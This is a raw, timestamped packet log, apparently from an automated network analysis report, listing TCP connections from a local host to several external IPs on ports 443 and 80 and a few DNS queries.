            Jul 5, 2024 02:57:57.557605982 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.557648897 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.557661057 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.557667971 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.557699919 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.557719946 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.558018923 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.558070898 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.558137894 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.558196068 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.558351994 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.558722973 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.558765888 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.558785915 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.558794975 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.558816910 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.558845043 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.558928013 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.558967113 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.558993101 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.559000015 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.559012890 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.559015036 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.559039116 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.559045076 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.559067011 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.559092045 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.559149027 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.559566975 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.559618950 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.559638977 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.559689045 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.559700966 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.559767962 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.559782028 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.559787989 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.559811115 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.559838057 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.559956074 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.560173035 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.753478050 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.753537893 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.753688097 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.753721952 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.753745079 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.753756046 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.753768921 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.753770113 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.753793955 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.753801107 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.753813028 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.753838062 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.754015923 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.754199982 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.754239082 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.754254103 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.754260063 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.754285097 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.754301071 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.754308939 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.754314899 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.754350901 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.754360914 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.754419088 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.754426003 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.754468918 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.754548073 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.754585028 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.754606962 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.754642010 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.754648924 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.754684925 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.754697084 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.754703045 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.754719019 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.754748106 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.755156040 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.755204916 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.755208015 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.755215883 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.755264044 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.755311966 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.755346060 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.755366087 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.755378962 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.755392075 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.755419970 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.755425930 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.755439997 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.755475044 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.755486965 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.755492926 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.755527973 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.755662918 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.756164074 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.756202936 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.756222963 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.756228924 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.756256104 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.756278992 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.756298065 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.756335974 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.756359100 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.756365061 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.756382942 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.756405115 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.756407976 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.756414890 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.756448984 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.756457090 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.756463051 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.756511927 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.756859064 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.757075071 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.757116079 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.757128954 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.757134914 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.757158041 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.757181883 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.757189035 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.757221937 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.757250071 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.757260084 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.757268906 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.757271051 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:57.757297039 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.757320881 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.758445978 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.758660078 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.759509087 CEST49168443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:57.759519100 CEST44349168188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:00.011401892 CEST4916980192.168.2.22193.122.130.0
            Jul 5, 2024 02:58:00.016258001 CEST8049169193.122.130.0192.168.2.22
            Jul 5, 2024 02:58:00.016314030 CEST4916980192.168.2.22193.122.130.0
            Jul 5, 2024 02:58:00.018212080 CEST4916980192.168.2.22193.122.130.0
            Jul 5, 2024 02:58:00.022977114 CEST8049169193.122.130.0192.168.2.22
            Jul 5, 2024 02:58:00.227503061 CEST49170443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:00.227524996 CEST44349170188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:00.227575064 CEST49170443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:00.227948904 CEST49170443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:00.227962017 CEST44349170188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:00.574167967 CEST8049169193.122.130.0192.168.2.22
            Jul 5, 2024 02:58:00.601886988 CEST4916980192.168.2.22193.122.130.0
            Jul 5, 2024 02:58:00.606662989 CEST8049169193.122.130.0192.168.2.22
            Jul 5, 2024 02:58:00.698853016 CEST44349170188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:00.699022055 CEST49170443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:00.718122959 CEST49170443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:00.718132973 CEST44349170188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:00.718359947 CEST44349170188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:00.720269918 CEST49170443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:00.726913929 CEST8049169193.122.130.0192.168.2.22
            Jul 5, 2024 02:58:00.760504961 CEST44349170188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:00.811568022 CEST49171443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:00.811595917 CEST44349171188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:00.811657906 CEST49171443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:00.817576885 CEST49171443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:00.817589998 CEST44349171188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:00.942497969 CEST8049169193.122.130.0192.168.2.22
            Jul 5, 2024 02:58:00.942598104 CEST4916980192.168.2.22193.122.130.0
            Jul 5, 2024 02:58:01.052191019 CEST44349170188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:01.052264929 CEST44349170188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:01.052315950 CEST49170443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:01.053704023 CEST49170443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:01.053713083 CEST44349170188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:01.296025991 CEST44349171188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:01.296118021 CEST49171443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:01.369818926 CEST49171443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:01.369832993 CEST44349171188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:01.370316029 CEST44349171188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:01.576517105 CEST44349171188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:01.576644897 CEST49171443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:02.035180092 CEST49171443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:02.076539993 CEST44349171188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:02.151195049 CEST44349171188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:02.151313066 CEST44349171188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:02.151388884 CEST49171443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:02.213872910 CEST49171443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:02.486906052 CEST4916980192.168.2.22193.122.130.0
            Jul 5, 2024 02:58:02.491817951 CEST8049169193.122.130.0192.168.2.22
            Jul 5, 2024 02:58:02.651166916 CEST8049169193.122.130.0192.168.2.22
            Jul 5, 2024 02:58:02.709551096 CEST49172443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:02.709598064 CEST44349172188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:02.709647894 CEST49172443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:02.710614920 CEST49172443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:02.710628986 CEST44349172188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:02.796927929 CEST49173443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:02.796967030 CEST44349173188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:02.797013044 CEST49173443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:02.797298908 CEST49173443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:02.797307968 CEST44349173188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:02.870568037 CEST8049169193.122.130.0192.168.2.22
            Jul 5, 2024 02:58:02.870629072 CEST4916980192.168.2.22193.122.130.0
            Jul 5, 2024 02:58:03.207998991 CEST44349172188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:03.211148024 CEST49172443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:03.211165905 CEST44349172188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:03.318490982 CEST44349173188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:03.318577051 CEST49173443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:03.322782993 CEST49173443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:03.322798014 CEST44349173188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:03.323061943 CEST44349173188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:03.323894978 CEST49173443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:03.361260891 CEST44349172188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:03.361345053 CEST44349172188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:03.361392975 CEST49172443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:03.361862898 CEST49172443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:03.364510059 CEST44349173188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:03.378276110 CEST4916980192.168.2.22193.122.130.0
            Jul 5, 2024 02:58:03.383651018 CEST8049169193.122.130.0192.168.2.22
            Jul 5, 2024 02:58:03.383754969 CEST4916980192.168.2.22193.122.130.0
            Jul 5, 2024 02:58:03.419235945 CEST4917480192.168.2.22193.122.6.168
            Jul 5, 2024 02:58:03.424298048 CEST8049174193.122.6.168192.168.2.22
            Jul 5, 2024 02:58:03.424462080 CEST4917480192.168.2.22193.122.6.168
            Jul 5, 2024 02:58:03.424609900 CEST4917480192.168.2.22193.122.6.168
            Jul 5, 2024 02:58:03.430356026 CEST8049174193.122.6.168192.168.2.22
            Jul 5, 2024 02:58:03.683394909 CEST44349173188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:03.683475971 CEST44349173188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:03.687278986 CEST49173443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:03.716329098 CEST49173443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:03.716351986 CEST44349173188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:04.075675011 CEST8049174193.122.6.168192.168.2.22
            Jul 5, 2024 02:58:04.286519051 CEST8049174193.122.6.168192.168.2.22
            Jul 5, 2024 02:58:04.286577940 CEST4917480192.168.2.22193.122.6.168
            Jul 5, 2024 02:58:04.428827047 CEST49175443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:04.428869963 CEST44349175188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:04.428921938 CEST49175443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:04.429394960 CEST49175443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:04.429408073 CEST44349175188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:04.920268059 CEST44349175188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:04.923259020 CEST49175443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:04.923280001 CEST44349175188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:05.059036970 CEST44349175188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:05.059107065 CEST44349175188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:05.059149981 CEST49175443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:05.063915014 CEST49175443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:05.105458021 CEST4917680192.168.2.22193.122.130.0
            Jul 5, 2024 02:58:05.111629963 CEST8049176193.122.130.0192.168.2.22
            Jul 5, 2024 02:58:05.111690044 CEST4917680192.168.2.22193.122.130.0
            Jul 5, 2024 02:58:05.111767054 CEST4917680192.168.2.22193.122.130.0
            Jul 5, 2024 02:58:05.116529942 CEST8049176193.122.130.0192.168.2.22
            Jul 5, 2024 02:58:06.169462919 CEST8049176193.122.130.0192.168.2.22
            Jul 5, 2024 02:58:06.323179960 CEST49177443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:06.323235035 CEST44349177188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:06.323292017 CEST49177443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:06.323795080 CEST49177443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:06.323808908 CEST44349177188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:06.368339062 CEST4917680192.168.2.22193.122.130.0
            Jul 5, 2024 02:58:06.806572914 CEST44349177188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:06.821815968 CEST49177443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:06.821846962 CEST44349177188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:06.973738909 CEST44349177188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:06.973820925 CEST44349177188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:06.973867893 CEST49177443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:06.974471092 CEST49177443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:06.995043039 CEST4917680192.168.2.22193.122.130.0
            Jul 5, 2024 02:58:07.000233889 CEST8049176193.122.130.0192.168.2.22
            Jul 5, 2024 02:58:07.000317097 CEST4917680192.168.2.22193.122.130.0
            Jul 5, 2024 02:58:07.019855976 CEST4917880192.168.2.22193.122.130.0
            Jul 5, 2024 02:58:07.029047966 CEST8049178193.122.130.0192.168.2.22
            Jul 5, 2024 02:58:07.029108047 CEST4917880192.168.2.22193.122.130.0
            Jul 5, 2024 02:58:07.029207945 CEST4917880192.168.2.22193.122.130.0
            Jul 5, 2024 02:58:07.035254955 CEST8049178193.122.130.0192.168.2.22
            Jul 5, 2024 02:58:07.518938065 CEST8049178193.122.130.0192.168.2.22
            Jul 5, 2024 02:58:07.544855118 CEST49179443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:07.544893980 CEST44349179188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:07.544943094 CEST49179443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:07.545407057 CEST49179443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:07.545422077 CEST44349179188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:07.720689058 CEST4917880192.168.2.22193.122.130.0
            Jul 5, 2024 02:58:08.037322044 CEST44349179188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:08.040282965 CEST49179443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:08.040301085 CEST44349179188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:08.166654110 CEST44349179188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:08.166771889 CEST44349179188.114.96.3192.168.2.22
            Jul 5, 2024 02:58:08.167009115 CEST49179443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:08.167388916 CEST49179443192.168.2.22188.114.96.3
            Jul 5, 2024 02:58:08.181627035 CEST4917880192.168.2.22193.122.130.0
            Jul 5, 2024 02:58:08.187705994 CEST8049178193.122.130.0192.168.2.22
            Jul 5, 2024 02:58:08.187769890 CEST4917880192.168.2.22193.122.130.0
            Jul 5, 2024 02:58:08.213696957 CEST4918080192.168.2.22132.226.247.73
            Jul 5, 2024 02:58:08.218556881 CEST8049180132.226.247.73192.168.2.22
            Jul 5, 2024 02:58:08.218638897 CEST4918080192.168.2.22132.226.247.73
            Jul 5, 2024 02:58:08.218700886 CEST4918080192.168.2.22132.226.247.73
            Jul 5, 2024 02:58:08.223952055 CEST8049180132.226.247.73192.168.2.22
            Jul 5, 2024 02:58:08.917251110 CEST8049180132.226.247.73192.168.2.22
            Jul 5, 2024 02:58:08.995202065 CEST49181443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:08.995232105 CEST44349181188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:08.995291948 CEST49181443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:08.999264956 CEST49181443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:08.999279976 CEST44349181188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:09.126554012 CEST8049180132.226.247.73192.168.2.22
            Jul 5, 2024 02:58:09.126677990 CEST4918080192.168.2.22132.226.247.73
            Jul 5, 2024 02:58:09.470432997 CEST44349181188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:09.474363089 CEST49181443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:09.474373102 CEST44349181188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:09.608026981 CEST44349181188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:09.608120918 CEST44349181188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:09.608659029 CEST49181443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:09.609055996 CEST49181443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:09.624360085 CEST4918080192.168.2.22132.226.247.73
            Jul 5, 2024 02:58:09.629595041 CEST8049180132.226.247.73192.168.2.22
            Jul 5, 2024 02:58:09.629846096 CEST4918080192.168.2.22132.226.247.73
            Jul 5, 2024 02:58:09.650903940 CEST4918280192.168.2.22132.226.8.169
            Jul 5, 2024 02:58:09.655992985 CEST8049182132.226.8.169192.168.2.22
            Jul 5, 2024 02:58:09.658524036 CEST4918280192.168.2.22132.226.8.169
            Jul 5, 2024 02:58:09.658627033 CEST4918280192.168.2.22132.226.8.169
            Jul 5, 2024 02:58:09.663395882 CEST8049182132.226.8.169192.168.2.22
            Jul 5, 2024 02:58:10.555691957 CEST8049182132.226.8.169192.168.2.22
            Jul 5, 2024 02:58:10.607405901 CEST49183443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:10.607445955 CEST44349183188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:10.607501030 CEST49183443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:10.608273983 CEST49183443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:10.608284950 CEST44349183188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:10.666527033 CEST8049182132.226.8.169192.168.2.22
            Jul 5, 2024 02:58:10.666589975 CEST4918280192.168.2.22132.226.8.169
            Jul 5, 2024 02:58:11.123579979 CEST44349183188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:11.126251936 CEST49183443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:11.126280069 CEST44349183188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:11.318793058 CEST44349183188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:11.318900108 CEST44349183188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:11.319235086 CEST49183443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:11.319503069 CEST49183443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:11.332995892 CEST4918280192.168.2.22132.226.8.169
            Jul 5, 2024 02:58:11.338200092 CEST8049182132.226.8.169192.168.2.22
            Jul 5, 2024 02:58:11.339255095 CEST4918280192.168.2.22132.226.8.169
            Jul 5, 2024 02:58:11.354341030 CEST4918480192.168.2.22193.122.6.168
            Jul 5, 2024 02:58:11.359256029 CEST8049184193.122.6.168192.168.2.22
            Jul 5, 2024 02:58:11.359905958 CEST4918480192.168.2.22193.122.6.168
            Jul 5, 2024 02:58:11.359989882 CEST4918480192.168.2.22193.122.6.168
            Jul 5, 2024 02:58:11.364773035 CEST8049184193.122.6.168192.168.2.22
            Jul 5, 2024 02:58:12.000936985 CEST8049184193.122.6.168192.168.2.22
            Jul 5, 2024 02:58:12.027236938 CEST49185443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:12.027277946 CEST44349185188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:12.027352095 CEST49185443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:12.027739048 CEST49185443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:12.027753115 CEST44349185188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:12.213538885 CEST4918480192.168.2.22193.122.6.168
            Jul 5, 2024 02:58:12.215511084 CEST8049184193.122.6.168192.168.2.22
            Jul 5, 2024 02:58:12.215585947 CEST4918480192.168.2.22193.122.6.168
            Jul 5, 2024 02:58:12.497266054 CEST44349185188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:12.501461983 CEST49185443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:12.501488924 CEST44349185188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:12.648930073 CEST44349185188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:12.649036884 CEST44349185188.114.97.3192.168.2.22
            Jul 5, 2024 02:58:12.649089098 CEST49185443192.168.2.22188.114.97.3
            Jul 5, 2024 02:58:12.649930954 CEST49185443192.168.2.22188.114.97.3
            Jul 5, 2024 02:59:09.075381041 CEST8049174193.122.6.168192.168.2.22
            Jul 5, 2024 02:59:09.075459003 CEST4917480192.168.2.22193.122.6.168
            Jul 5, 2024 02:59:17.000730991 CEST8049184193.122.6.168192.168.2.22
            Jul 5, 2024 02:59:17.000802994 CEST4918480192.168.2.22193.122.6.168
            Jul 5, 2024 02:59:52.023165941 CEST4918480192.168.2.22193.122.6.168
            Jul 5, 2024 02:59:52.028637886 CEST8049184193.122.6.168192.168.2.22

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Jul 5, 2024 02:57:45.569900990 CEST5456253192.168.2.228.8.8.8
            Jul 5, 2024 02:57:45.580871105 CEST53545628.8.8.8192.168.2.22
            Jul 5, 2024 02:57:46.757600069 CEST5291753192.168.2.228.8.8.8
            Jul 5, 2024 02:57:46.767744064 CEST53529178.8.8.8192.168.2.22
            Jul 5, 2024 02:57:46.769013882 CEST6275153192.168.2.228.8.8.8
